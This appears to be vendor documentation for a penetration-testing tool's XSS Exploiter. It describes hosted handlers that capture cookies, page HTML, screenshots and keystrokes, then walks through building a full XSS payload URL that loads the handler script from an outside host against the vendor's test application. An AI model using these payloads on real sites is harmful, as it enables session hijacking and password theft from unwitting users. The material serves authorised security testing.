If you obtained an XSS (Cross-Site Scripting) in your scan results with the Website Scanner or XSS Scanner, you can use the XSS Exploiter to validate the Attack Vector and obtain proof of concept for these findings.
The Label will be used to identify your handler. Choose something meaningful to you, such as the name of the web application, the organization, a testing scenario, etc.
You can specify which data to extract from the vulnerable web application by exploiting the XSS injection using the Search methods. The available options are:
- Get cookies – Have the script fetch the user’s cookies. A common field that is stored here is the session cookie. Stealing this can be used to impersonate the user and do actions on their behalf. In order to do this, you only need to replace your own session cookie when accessing the application with the one stolen from the user.
- Get HTML content – Have the script fetch the HTML content of the page the user is on. This includes any modifications caused by user interaction, such as automatic completion of forms or sensitive user data displayed inside an Account Details page.
- Get page screenshot – Have the script fetch a screenshot of the generated page. This is useful when presenting the Proof-of-Concept to non-technical users, as definite visual proof that the private session of another user can be accessed.
- Get keystrokes – Have the script intercept and record user keyboard input. A keylogger is especially useful on pages where sensitive user input is requested, such as login pages. It can retrieve usernames, passwords, specific search terms used, or other sensitive user-inputted data, that is not available at the end of the page load.
Based on the selected options, the tool generates a JavaScript file that can be publicly accessed at a unique URL. That URL can be embedded in an XSS payload which, when accessed by a browser, leads to the script being loaded and executed, fetching the chosen data and sending it back to the server.
The tool is capable of fetching the following information:
- Source IP address
- URL Parameters
- User Agent
- All HTTP headers
- Operating system (deducted from User-Agent)
- Request date
Each XSS Handler is unique. Only you can see the data extracted by your handlers. Nobody else can use your payloads or send data back to your handler unless they know your exact URL.
A handler is active for 60 days. After this time expires, you will still be able to view your results, but the handler will stop logging new requests. Additionally, there is a limit of 500 requests that can be logged per handler.
Here is an example of how to detect and validate an XSS using Pentest-Tools.com.
For this example, we will use our test application, www.pentest-ground.com/private-dev.
To identify the XSS injection with Pentest-Tools.com, we will perform a scan with either Website Scanner or XSS Scanner.
After performing an authenticated scan with Website Scanner on www.pentest-ground.com/private-dev, we obtain the following result:
The finding includes the Attack Vector, which we will exploit. By clicking the ‘Attack Target’ button in the right, we submit the vulnerable payload. A new tab opens with the following message:
The Attack Vector includes an identification key (the account number) and a script tag in URL format, that opens the XSS statement that will run in the web page.
The next step is to generate the XSS handler using the XSS Exploiter. At this step, you can select the Search methods, as previously discussed in the article.
So now we have:
- The Attack vector
http://www.pentest-ground.com/private-dev/payment_history.php?account_no=%27%22%3Cscript%3E alert%281%29%3B%3C%2Fscript%3E
- The XSS handler
https://pentest-tools.com/xss-payload/RpzlItGBOP/
And we need to combine the two into an XSS payload. We get the following result:
http://www.pentest-ground.com/private-dev/payment_history.php?account_no= <script src='https://pentest-tools.com/xss-payload/RpzlItGBOP/'></script>
The rule is to follow the format from the Attack vector and insert the XSS handler in the script section.
We paste the obtained link in the browser. The Keystrokes search requires keyboard input from the user in order to be validated. An URL can be accessed several times.
And here is the result:
The XSS injection is validated and it has extracted the Cookies, HTML Content, Page Screenshot, Keystrokes.